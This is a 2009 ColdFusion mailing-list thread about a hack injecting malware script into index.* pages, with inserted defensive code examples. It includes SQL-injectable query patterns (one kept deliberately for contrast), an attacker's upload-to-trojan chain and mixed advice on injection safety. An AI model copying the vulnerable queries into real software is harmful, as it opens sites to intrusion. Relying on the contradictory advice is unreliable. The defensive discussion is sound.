> From: Mark Kruger [mailto:mkru...@cfwebtools.com] 
> Sent: Monday, April 13, 2009 1:14 PM
> To: cf-talk
> Subject: RE: Question about hack
> 
> 
> Donnie,
> 
> I believe this is the same attack I have been helping another 
> customer with and it does not appear to be related to CF. 
> Instead, it appears to start with a malware install of some 
> kind on the server (and possibly a root kit) and then 
> progress to the creation of accounts and the changing of file 
> permissions. Another theory gaining weight (and illustrating 
> that we don't know much yet) is that this attack is an agent 
> on a client computer that piggybacks onto FTP - which 
> explains a few things but not everything. I'm guessing some 
> combination at this point.
> 
> Anyway, I agree that cfexecute is a dangerous tag that needs 
> to be controlled, but it does not appear to be the culprit. 
> All of this advice is good, but the only place that CF comes 
> into play on this particular hack happens to be the 
> propensity to use "index.cfm" as the home page script. The 
> attack targets "index.*" files and affects (on the server I 
> am working with) Index.cfm, index.html and index.php etc.
> 
> -Mark
>  



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321557

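Nick's point about banning IPs after a run of failed FTP logins is a server-side setting, but the same threshold is easy to check against existing logs when working out what happened. The following is an added Python example (not from the thread): it parses W3C extended log lines using the "#Fields:" header, groups FTP reply 530 (login failed) by client IP, and flags any IP that reaches the threshold inside a sliding time window. The field names follow what IIS FTP logging writes; the log lines, hosts and IPs are constructed for the example.

```python
"""FTP brute-force detection from W3C-format logs (added example, not from the thread)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

Row = Dict[str, str]


def parse_w3c(lines: Iterable[str]) -> List[Row]:
    """Parse W3C extended log lines, taking column names from the #Fields header."""
    fields, rows = None, []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("data line before any #Fields header")
        rows.append(dict(zip(fields, line.split())))
    return rows


def failed_logins(rows: List[Row]) -> Dict[str, List[datetime]]:
    """Timestamps of failed PASS commands (FTP reply 530) grouped by client IP."""
    out: Dict[str, List[datetime]] = defaultdict(list)
    for r in rows:
        if r.get("cs-method", "").upper() == "PASS" and r.get("sc-status", "").startswith("530"):
            out[r["c-ip"]].append(datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S"))
    return out


def brute_force_sources(rows: List[Row], threshold: int = 5,
                        window: timedelta = timedelta(minutes=10)) -> Dict[str, int]:
    """IPs with at least `threshold` failures inside any `window`; value is total failures."""
    flagged: Dict[str, int] = {}
    for ip, times in failed_logins(rows).items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


# Constructed sample log: one password-guessing source, one user who mistyped once,
# and one source whose five failures are spread over two hours.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.0
#Version: 1.0
#Date: 2009-04-12 03:15:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2009-04-12 03:15:01 203.0.113.9 - 192.0.2.10 21 USER administrator 331 0
2009-04-12 03:15:01 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:15:03 203.0.113.9 - 192.0.2.10 21 USER administrator 331 0
2009-04-12 03:15:03 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:15:05 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:15:07 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:15:09 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:15:11 203.0.113.9 administrator 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:20:40 198.51.100.4 - 192.0.2.10 21 USER webmaster 331 0
2009-04-12 03:20:41 198.51.100.4 webmaster 192.0.2.10 21 PASS *** 530 1326
2009-04-12 03:20:55 198.51.100.4 webmaster 192.0.2.10 21 PASS *** 230 0
2009-04-12 04:00:00 192.0.2.77 guest 192.0.2.10 21 PASS *** 530 1326
2009-04-12 04:30:00 192.0.2.77 guest 192.0.2.10 21 PASS *** 530 1326
2009-04-12 05:00:00 192.0.2.77 guest 192.0.2.10 21 PASS *** 530 1326
2009-04-12 05:30:00 192.0.2.77 guest 192.0.2.10 21 PASS *** 530 1326
2009-04-12 06:00:00 192.0.2.77 guest 192.0.2.10 21 PASS *** 530 1326
"""


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG.splitlines())
    for ip, count in brute_force_sources(rows).items():
        print("%s: %d failed logins, ban candidate" % (ip, count))
```

With the default ten-minute window only 203.0.113.9 is flagged; the slow source at 192.0.2.77 only shows up if the window is widened, which is the trade-off behind whatever lockout threshold the FTP server is configured with. Finding a source this way is a reason to rotate the affected FTP credentials, not just to ban the address.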

RE: Question about hack

2009-04-13 Thread Mark Kruger

Donnie,

I believe this is the same attack I have been helping another customer with
and it does not appear to be related to CF. Instead, it appears to start
with a malware install of some kind on the server (and possibly a root kit)
and then progress to the creation of accounts and the changing of file
permissions. Another theory gaining weight (and illustrating that we don't
know much yet) is that this attack is an agent on a client computer that
piggybacks onto FTP - which explains a few things but not everything. I'm
guessing some combination at this point.

Anyway, I agree that cfexecute is a dangerous tag that needs to be
controlled, but it does not appear to be the culprit. All of this advice is
good, but the only place that CF comes into play on this particular hack
happens to be the propensity to use "index.cfm" as the home page script. The
attack targets "index.*" files and affects (on the server I am working with)
Index.cfm, index.html and index.php etc.

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com] 
Sent: Monday, April 13, 2009 8:30 AM
To: cf-talk
Subject: Re: Question about hack


Hi Nick,

I know this post is a bit late but to your original question, that attack is
as a result of incorrect file/iis permissions and is not an XSS attack. I
would even bet that you are on a shared server (at HMS) since one of my
client sites had this exact same problem. The attacker would have gained
access to the file system (possibly via FTP) and executed code that injected
the code into all index.* files on the server (not just your hosting
account). We have had a lot of problems trying to get this sorted out. It
appears that the issue was with security related to the windows script host
and/or CFEXECUTE. The only thing you can do to prevent this is work with
your hosting provider to secure the system or move to a VPS or dedicated
account and make sure your FTP accounts are secure.

HTH

Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"
==
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.



On Mon, Apr 13, 2009 at 1:30 PM, Richard White  wrote:
>
> hi dave, i have scripts that write to the file system as well. what 
> would i need to do to secure them, do you have a link that i could 
> read in relation to this as i am a little lost as to what to do
>
> thanks
>
>> > We are having to scrub our files to remove the injected code (which
>> is being written directly
>> > to the files as the result of the hack allowing "FULL CONTROL" for
>> the Everyone user on the
>> > machine.
>> >
>> > Have you determined a solution for removing/preventing this?
>>
>> First, audit your code to find any scripts that can write to the 
>> filesystem.
>> Second, audit your code to find any scripts that pass unfiltered user 
>> input to the database.
>> Third, fix that code.
>> Fourth, configure filesystem permissions properly to prevent CF or 
>> your database from writing to the web server's webroot.
>>
>> Dave Watts, CTO, Fig Leaf Software
>> http://www.figleaf.com/
>>
>> Fig Leaf Software provides the highest caliber vendor-authorized 
>> instruction at our training centers in Washington DC, Atlanta, 
>> Chicago, Baltimore, Northern Virginia, or on-site at your location.
>> Visit http://training.figleaf.com/ for more
> information!
>
> 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321554


RE: Question about hack

2009-04-13 Thread Andy Matthews

Checking log files, reviewing websites, automated emails with error
messages. Those are just a few examples. 

-Original Message-
From: Richard White [mailto:rich...@j7is.co.uk] 
Sent: Monday, April 13, 2009 7:16 AM
To: cf-talk
Subject: Re: Question about hack


> We have been attacked by the exact same hack.   We discovered it on 
> April 6 and it has proven impossible to clean/remove.

hi, i am relatively new to CF and building web applications. i have built a
few web apps and tried to use as much security as i can. my question is how
do you guys discover that you have been hacked? would a hosting company let
you know? does the customer let you know of changes in behaviour? do you
have a piece of software looking for anything suspicious in the logs, etc...

thanks 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321552


Re: Question about hack

2009-04-13 Thread Donnie Bachan (Gmail)

Hi Nick,

I know this post is a bit late but to your original question, that
attack is as a result of incorrect file/iis permissions and is not an
XSS attack. I would even bet that you are on a shared server (at HMS)
since one of my client sites had this exact same problem. The attacker
would have gained access to the file system (possibly via FTP) and
executed code that injected the code into all index.* files on the
server (not just your hosting account). We have had a lot of problems
trying to get this sorted out. It appears that the issue was with
security related to the windows script host and/or CFEXECUTE. The only
thing you can do to prevent this is work with your hosting provider to
secure the system or move to a VPS or dedicated account and make sure
your FTP accounts are secure.

HTH

Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"
==
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.



On Mon, Apr 13, 2009 at 1:30 PM, Richard White  wrote:
>
> hi dave, i have scripts that write to the file system as well. what would i 
> need to do to secure them, do you have a link that i could read in relation 
> to this as i am a little lost as to what to do
>
> thanks
>
>> > We are having to scrub our files to remove the injected code (which
>> is being written directly
>> > to the files as the result of the hack allowing "FULL CONTROL" for
>> the Everyone user on the
>> > machine.
>> >
>> > Have you determined a solution for removing/preventing this?
>>
>> First, audit your code to find any scripts that can write to the
>> filesystem.
>> Second, audit your code to find any scripts that pass unfiltered user
>> input to the database.
>> Third, fix that code.
>> Fourth, configure filesystem permissions properly to prevent CF or
>> your database from writing to the web server's webroot.
>>
>> Dave Watts, CTO, Fig Leaf Software
>> http://www.figleaf.com/
>>
>> Fig Leaf Software provides the highest caliber vendor-authorized
>> instruction at our training centers in Washington DC, Atlanta,
>> Chicago, Baltimore, Northern Virginia, or on-site at your location.
>> Visit http://training.figleaf.com/ for more
> information!
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321551


Re: Question about hack

2009-04-13 Thread Richard White

hi dave, i have scripts that write to the file system as well. what would i 
need to do to secure them, do you have a link that i could read in relation to 
this as i am a little lost as to what to do

thanks

> > We are having to scrub our files to remove the injected code (which 
> is being written directly
> > to the files as the result of the hack allowing "FULL CONTROL" for 
> the Everyone user on the
> > machine.
> >
> > Have you determined a solution for removing/preventing this?
> 
> First, audit your code to find any scripts that can write to the 
> filesystem.
> Second, audit your code to find any scripts that pass unfiltered user
> input to the database.
> Third, fix that code.
> Fourth, configure filesystem permissions properly to prevent CF or
> your database from writing to the web server's webroot.
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> 
> Fig Leaf Software provides the highest caliber vendor-authorized
> instruction at our training centers in Washington DC, Atlanta,
> Chicago, Baltimore, Northern Virginia, or on-site at your location.
> Visit http://training.figleaf.com/ for more 
information! 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321550


Re: Question about hack

2009-04-13 Thread Richard White

> We have been attacked by the exact same hack.   We discovered it on 
> April 6 and it has proven impossible to clean/remove.

hi, i am relatively new to CF and building web applications. i have built a few 
web apps and tried to use as much security as i can. my question is how do you 
guys discover that you have been hacked? would a hosting company let you know? 
does the customer let you know of changes in behaviour? do you have a piece of 
software looking for anything suspicious in the logs, etc...

thanks 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321549


Re: Question about hack

2009-04-10 Thread ALL

Jason, look for a file named logs.asp or log.asp or one named top.aspx. If
you see either of those files on your computer, look at them and possibly
delete them. Those were the files where the infection was being
told what to do.
Also, will you tell me what Content Management System any of you guys that
have the infection use? Because I am starting to think the only thing that
is relating this to ColdFusion is that CMS, which is very insecure and very
old.

Also, seeing as how the info we are experiencing is the same, I figured I'd post
the IP address of what infected us in the first place:

61.236.71.195

Check your log files to see if that IP address turns up and see what happened
for yourself; the IP address turns out to be something in China, I believe.

On Fri, Apr 10, 2009 at 2:04 PM, Dave Watts  wrote:

>
> > We are having to scrub our files to remove the injected code (which is
> being written directly
> > to the files as the result of the hack allowing "FULL CONTROL" for the
> Everyone user on the
> > machine.
> >
> > Have you determined a solution for removing/preventing this?
>
> First, audit your code to find any scripts that can write to the
> filesystem.
> Second, audit your code to find any scripts that pass unfiltered user
> input to the database.
> Third, fix that code.
> Fourth, configure filesystem permissions properly to prevent CF or
> your database from writing to the web server's webroot.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
>
> Fig Leaf Software provides the highest caliber vendor-authorized
> instruction at our training centers in Washington DC, Atlanta,
> Chicago, Baltimore, Northern Virginia, or on-site at your location.
> Visit http://training.figleaf.com/ for more information!
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321520


Re: Question about hack

2009-04-10 Thread Dave Watts

> We are having to scrub our files to remove the injected code (which is being 
> written directly
> to the files as the result of the hack allowing "FULL CONTROL" for the 
> Everyone user on the
> machine.
>
> Have you determined a solution for removing/preventing this?

First, audit your code to find any scripts that can write to the filesystem.
Second, audit your code to find any scripts that pass unfiltered user
input to the database.
Third, fix that code.
Fourth, configure filesystem permissions properly to prevent CF or
your database from writing to the web server's webroot.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321519


Re: Question about hack

2009-04-10 Thread Jason Bach

Nick:

We have been attacked by the exact same hack.   We discovered it on April 6 and 
it has proven impossible to clean/remove.

I have read through this thread, but I don't see where you found anything 
specifically causing the problem.

We are also using IIS6 and CF7 and have approx 300 sites on this shared 
webserver.

We are having to scrub our files to remove the injected code (which is being 
written directly to the files as the result of the hack allowing "FULL CONTROL" 
for the Everyone user on the machine).

Have you determined a solution for removing/preventing this?

Let me know.

JB



>Hi there.  We've just seen a hack attempt that we haven't seen before and I
>wanted to get feedback.
>
>The symptom is that some script code is inserted at the bottom of certain
>pages (e.g. index.cfm).  The script (which has been scrubbed) looks like
>this:
> 
>
>The script downloads malware, which we obviously want to prevent.  We're
>trying to determine how it's getting in there, whether through an old site
>with inadequate code or the OS or something else.  Any thoughts?
>
>This is on a server running IIS 6 / CF7.
>
>Thanks in advance,
>
>Nick 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321518


Re: Question about hack

2009-04-10 Thread Matthew

OK thanks for the pointers all, I better roll my sleeves up and start editing 
before I get done...

On 10 Apr 2009, at 18:21, "Brad Wood"  wrote:


Using MS SQL the code below would be safe as long as all your parameters are 
strings and encased in single quotes, since the cfquery tag will 
automatically escape any single quotes that exist in the #url.uid# variable.

If you were to pass in a numeric value to the stored procedure which did not 
have single ticks around it, you would be vulnerable again even though it is 
a stored proc call.

If it's all the same to you, I would recommend using the cfstoreproc tag to 
call your procedure.  It allows for the cfprocparam tag for your parameters 
which can optionally validate your inputs' data type as well.  (just like 
cfqueryparam does)

~Brad

- Original Message - 
From: "Matthew Allen" 
To: "cf-talk" 
Sent: Friday, April 10, 2009 1:04 PM
Subject: Re: Question about hack



OK, point taken: not safe with MySQL but fine with MSSQL? I just need to 
know if I should start working on my old MS SQL code; so far none of it has 
suffered injection attacks. It might be by sheer luck, or maybe all is 
well with it as it is on an MS SQL server, right?

Not necessarily. With the proper configuration of MySQL (multiple
statements
allowed, and \ escaping single quotes) your example below could be
hacked.

Brad




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321516


Re: Question about hack

2009-04-10 Thread Matthew Allen

I've always had the impression that if you use a stored procedure and it's 
not a dynamically built string, you're fine. So, like my example in the previous post, 
you put your query in MS SQL and use EXEC to call the query on your CF pages; I 
sometimes declare the parameter, but most times it's like the way I've described 
before. Should I stop everything I'm doing now and start editing my code?!! 
Luckily I'm less than 2 years in CF; I only have about 6 applications to worry 
about...

Stored Proc:
@uid uniqueidentifier
AS
BEGIN
SELECT ID, column1, column2..etc
FROM tbltable
WHERE UID = @uid
END

CF Page:

DECLARE @Param1 varchar;
EXEC usp_getSomeData 
@param = '#url.uid#' 
 

>Matt,
>
>Why are you not using cfqueryparam in the cf code below? Do you have a good
>reason not to do so? 
>
>-mark
>
>
>
>Mark A. Kruger, CFG, MCSE
>(402) 408-3733 ext 105
>www.cfwebtools.com
>www.coldfusionmuse.com
>www.necfug.com
>


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321515


Re: Question about hack

2009-04-10 Thread Brad Wood

Using MS SQL the code below would be safe as long as all your parameters are 
strings and encased in single quotes, since the cfquery tag will 
automatically escape any single quotes that exist in the #url.uid# variable.

If you were to pass in a numeric value to the stored procedure which did not 
have single ticks around it, you would be vulnerable again even though it is 
a stored proc call.

If it's all the same to you, I would recommend using the cfstoreproc tag to 
call your procedure.  It allows for the cfprocparam tag for your parameters 
which can optionally validate your inputs' data type as well.  (just like 
cfqueryparam does)

~Brad

- Original Message - 
From: "Matthew Allen" 
To: "cf-talk" 
Sent: Friday, April 10, 2009 1:04 PM
Subject: Re: Question about hack


>
> OK, point taken: not safe with MySQL but fine with MSSQL? I just need to 
> know if I should start working on my old MS SQL code; so far none of it has 
> suffered injection attacks. It might be by sheer luck, or maybe all is 
> well with it as it is on an MS SQL server, right?
>
>> Not necessarily. With the proper configuration of MySQL (multiple
>> statements
>> allowed, and \ escaping single quotes) your example below could be
>> hacked.
>>
>>Brad
>> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321514


RE: Question about hack

2009-04-10 Thread Mark Kruger

Matt,

Why are you not using cfqueryparam in the cf code below? Do you have a good
reason not to do so? 

-mark



Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Matthew Allen [mailto:a.matthe...@yahoo.com] 
Sent: Friday, April 10, 2009 1:05 PM
To: cf-talk
Subject: Re: Question about hack


OK, point taken: not safe with MySQL but fine with MSSQL? I just need to know
if I should start working on my old MS SQL code; so far none of it has suffered
injection attacks. It might be by sheer luck, or maybe all is well with
it as it is on an MS SQL server, right?

> Not necessarily. With the proper configuration of MySQL (multiple 
> statements allowed, and \ escaping single quotes) your example below 
> could be hacked.
> 
>Brad
> 
> - Original Message -
> From: "Matthew Allen" 
> To: "cf-talk" 
> Sent: Friday, April 10, 2009 12:25 PM
> Subject: Re: Question about hack
> 
> 
> >
> > To be more precise, would the code below prevent an injection
> attack?
> > Stored proc:
> > ...
> > @uid uniqueidentifier
> > AS
> > BEGIN
> > SELECT ID,column1, column2..etc
> > FROM tbltable
> > WHERE UID = @uid
> > END
> >
> > CF Code:
> >  EXEC 
> > usp_getSomeData @param = '#url.uid#'
> > 
> > 




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321513


Re: Question about hack

2009-04-10 Thread Matthew Allen

OK, point taken: not safe with MySQL but fine with MSSQL? I just need to know if 
I should start working on my old MS SQL code; so far none of it has suffered 
injection attacks. It might be by sheer luck, or maybe all is well with it as it 
is on an MS SQL server, right?

> Not necessarily. With the proper configuration of MySQL (multiple 
> statements 
> allowed, and \ escaping single quotes) your example below could be 
> hacked.
> 
>Brad
> 
> - Original Message - 
> From: "Matthew Allen" 
> To: "cf-talk" 
> Sent: Friday, April 10, 2009 12:25 PM
> Subject: Re: Question about hack
> 
> 
> >
> > To be more precise, would the code below prevent an injection 
> attack?
> > Stored proc:
> > ...
> > @uid uniqueidentifier
> > AS
> > BEGIN
> > SELECT ID,column1, column2..etc
> > FROM tbltable
> > WHERE UID = @uid
> > END
> >
> > CF Code:
> > 
> > EXEC usp_getSomeData
> > @param = '#url.uid#'
> > 
> > 


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321512


Re: Question about hack

2009-04-10 Thread Brad Wood

Not necessarily. With the proper configuration of MySQL (multiple statements 
allowed, and \ escaping single quotes) your example below could be hacked.

http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL

The underlying reason is because you are not explicitly telling your SQL 
server what is SQL code and what is the parameter.  The one and only 
sure-fire way to do that is with the likes of cfqueryparam, cfprocparam,  or 
sp_executesql (MS SQL Server).

~Brad

- Original Message - 
From: "Matthew Allen" 
To: "cf-talk" 
Sent: Friday, April 10, 2009 12:25 PM
Subject: Re: Question about hack


>
> To be more precise, would the code below prevent an injection attack?
> Stored proc:
> ...
> @uid uniqueidentifier
> AS
> BEGIN
> SELECT ID,column1, column2..etc
> FROM tbltable
> WHERE UID = @uid
> END
>
> CF Code:
> 
> EXEC usp_getSomeData
> @param = '#url.uid#'
> 
> 
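An added example (not code from Brad's or Matthew's posts) that puts the interpolated EXEC call quoted above beside the two parameterised forms Brad recommends in this sub-thread, covering both his single-quote and his MySQL/backslash points; the datasource name siteDSN and the second procedure usp_getById are assumed.

```cfml
<!--- Added example; assumes a datasource "siteDSN" and the procedure
      usp_getSomeData(@uid uniqueidentifier) from the thread. --->

<!--- The form from the thread. cfquery doubles the single quotes inside
      #url.uid#, which is why it looks safe on MS SQL Server. It still
      pastes the value into the SQL text, so a driver that treats backslash
      as an escape (MySQL) plus multiple statements, or any parameter
      written without quotes, lets the value be read as SQL code. --->
<cfquery name="qInterpolated" datasource="siteDSN">
    EXEC usp_getSomeData @uid = '#url.uid#'
</cfquery>

<!--- Form 1: cfqueryparam. The value travels as a bound parameter; the
      statement text the server parses never contains it. --->
<cfquery name="qParam" datasource="siteDSN">
    EXEC usp_getSomeData
        @uid = <cfqueryparam value="#url.uid#" cfsqltype="cf_sql_idstamp">
</cfquery>

<!--- Form 2 (Brad's recommendation): cfstoredproc with cfprocparam.
      cfsqltype validates the data type before the call is made, so a
      value that is not a uniqueidentifier is rejected, not sent. --->
<cfif not isValid("guid", url.uid)>
    <cfthrow type="InvalidInput" message="uid must be a GUID">
</cfif>
<cfstoredproc procedure="usp_getSomeData" datasource="siteDSN">
    <cfprocparam type="in" cfsqltype="cf_sql_idstamp" value="#url.uid#">
    <cfprocresult name="qProc">
</cfstoredproc>

<!--- Brad's numeric case: with no quotes around the value there is nothing
      for cfquery to escape, so  EXEC usp_getById @id = #url.id#  is open
      on every database. Bind it instead (usp_getById is hypothetical). --->
<cfquery name="qById" datasource="siteDSN">
    EXEC usp_getById
        @id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>
```

The first block is kept only to show what the other three replace; either bound form removes the need for any quote escaping in the CF page.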

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321509


RE: Question about hack

2009-04-10 Thread Chad Gray

One thing I will add is, if you are using CFFile to do the upload, use its 
"accept" attribute to only accept the MIME types you want to upload.  If it 
errors, capture it and output a nice error message.

It is not foolproof, but another layer in making file upload more safe.



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321508


Re: Question about hack

2009-04-10 Thread Brad Wood

Technically, no.

In this post I have an example of a procedure which would be vulnerable to 
all kinds of SQL injection attacks.
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me

SQL injection is made possible when you don't differentiate between your SQL 
code and arbitrary parameters.  ANY form of dynamic SQL can be susceptible 
to that.

~Brad

- Original Message - 
From: "Matthew Allen" 
To: "cf-talk" 
Sent: Friday, April 10, 2009 12:10 PM
Subject: Re: Question about hack


>
>>This is yet another example where CFQUERYPARAM would have prevented
>>the attack. Every time someone says it's unnecessary, I'm going to
>>point them to this thread.
>
> Is it safe to assume then that using stored procedure would have prevented 
> the attack?
>


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321506


Re: Question about hack

2009-04-10 Thread Dave Watts

> Is it safe to assume then that using stored procedure would have prevented 
> the attack?

Yes, unless the stored procedure is using something like EXECUTE,
EXEC, etc to build executable strings of SQL.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321505


Re: Question about hack

2009-04-10 Thread Matthew Allen

To be more precise, would the code below prevent an injection attack?
Stored proc:
...
@uid uniqueidentifier
AS
BEGIN
SELECT ID,column1, column2..etc
FROM tbltable
WHERE UID = @uid
END

CF Code:

EXEC usp_getSomeData
@param = '#url.uid#'


>>This is yet another example where CFQUERYPARAM would have prevented
>>the attack. Every time someone says it's unnecessary, I'm going to
>>point them to this thread.
>
>Is it safe to assume then that using stored procedure would have prevented the 
>attack? 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321504


Re: Question about hack

2009-04-10 Thread Matthew Allen

>This is yet another example where CFQUERYPARAM would have prevented
>the attack. Every time someone says it's unnecessary, I'm going to
>point them to this thread.

Is it safe to assume then that using stored procedure would have prevented the 
attack? 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321501


Re: Question about hack

2009-04-10 Thread Dave Watts

> What happened to us was not actually caused by ColdFusion. We found that it
> was a ColdFusion script we were running that was not secure.

Of course. CF is just like any other app server - it will do exactly
what you tell it to do. If you have CF programs that can write to the
filesystem, they need to be secured to prevent them from writing to
the filesystem in ways you don't want.

> The attacker used a method called sql injection attack, which means he/she 
> queried
> the server hundreds if not thousands of times data mining the database until
> they got the site's admin/password.

You can easily prevent this by using CFQUERYPARAM in all database
queries for any data that comes from the client.

> Hope this comes of use to some other people having this issue; I cannot
> stress enough how important it is to escape SQL strings before sending them
> to a SQL server of any kind, and how important it is to rename files that
> people upload when writing a script. (The most secure way is generally to do
> two things: first you can verify images by using code to make sure the file
> is actually an image [I'm sure you can find some free code to do so], and
> rename the image so it does not put an extension on the file, or make sure
> the file ends in .jpg, .gif, etc..., and make sure you do not allow script
> execution in the file you upload to.)

In general, you should be very careful when allowing file uploads. You
might rename files, you might place those files in a directory that
blocks execution, you might place those files in a non-web-accessible
directory.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321499


Re: Question about hack

2009-04-10 Thread James Holmes

2009/4/10 ALL :
>
>  I cannot stress enough how important it is to escape sql strings before 
> sending them
> to a SQL server of any kind,

This is yet another example where CFQUERYPARAM would have prevented
the attack. Every time someone says it's unnecessary, I'm going to
point them to this thread.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321497


Re: Question about hack

2009-04-10 Thread ALL

After a lot of looking into and investigating last night, we have found some
more info on the subject.
What happened to us was not actually caused by ColdFusion. We found that it
was a ColdFusion script we were running that was not secure. The attacker
used a method called SQL injection attack, which means he/she queried the
server hundreds if not thousands of times, data mining the database until
they got the site's admin/password.

So, there was 1 security issue with the ColdFusion script we were using.
After he got the admin/password they logged into the site's administration
and uploaded a "gif", but it was not actually a "gif"; rather it was an asp
page that got executed on the server, because whoever wrote our CMS
obviously didn't know how to code securely. (file name was logs.asp or
log.aspx or a combo of the two)

After he had an asp page on the server, he used that script to upload another
asp page named "tops.aspx" which, when I reviewed the code and did some
research into it, I found was actually a well known trojan that
was specifically designed to give "attackers" access to infected servers.

Hope this comes of use to some other people having this issue; I cannot
stress enough how important it is to escape SQL strings before sending them
to a SQL server of any kind, and how important it is to rename files that
people upload when writing a script. (The most secure way is generally to do
two things: first you can verify images by using code to make sure the file
is actually an image [I'm sure you can find some free code to do so], and
rename the image so it does not put an extension on the file, or make sure
the file ends in .jpg, .gif, etc..., and make sure you do not allow script
execution in the file you upload to.)

Hope this helps,
-Nathan

On Fri, Apr 10, 2009 at 7:53 AM, Mark Kruger  wrote:

>
> Nathan,
>
> Can you answer a question for me. Does this attack affect "all cfm" pages
> or
> does it affect "index.*" pages?
>
> -Mark
>
>
>
> Mark A. Kruger, CFG, MCSE
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
> -Original Message-----
> From: Nathan Bruer [mailto:thegreat...@gmail.com]
> Sent: Thursday, April 09, 2009 11:26 PM
> To: cf-talk
> Subject: Re: Question about hack
>
>
> Ok, I wanted to post here because I have been looking around on google the
> last few days because we had the same issue to give an update on to all the
> findings we have found from our investigation...
>
> First off this IS an issue with either mssql/msaccess or ColdFusion or the
> combination of the two.
>
> Whatever has been writing the script seems to be embedded in either one of
> the coldfusion files somewhere or in the database you are executing from,
> we
> have not figured it out yet.
>
> This is what we have decided to do to solve the issue...
>
> Step 1: Shut down IIS. Whatever is causing this requires IIS to run from
> what we have seen.
>
> Step 2: I have written a simple script in PHP (because that is what I
> script
> in) that will go through every file in the specified path and remove
> anything that it finds matching the pattern in the 2.txt file. (default is
> what was being written to our server). It will log all the files it changed
> to alog.log file in the same directory. Here is what you need to do to run
> the script...
>
>   1. Download: http://www.rallyinfo.com/fixer.zip
>   2. Extract it somewhere on the server.
>   3. Install PHP (if you don't already have it, REQ PHP5+ [I believe])
>   4. Open the 1.php file in the folder you extracted it to, and edit the
> line that says "Path = 'D:/'" to whatever path you want to check for (I'd
> suggest running it multiple times on every drive).
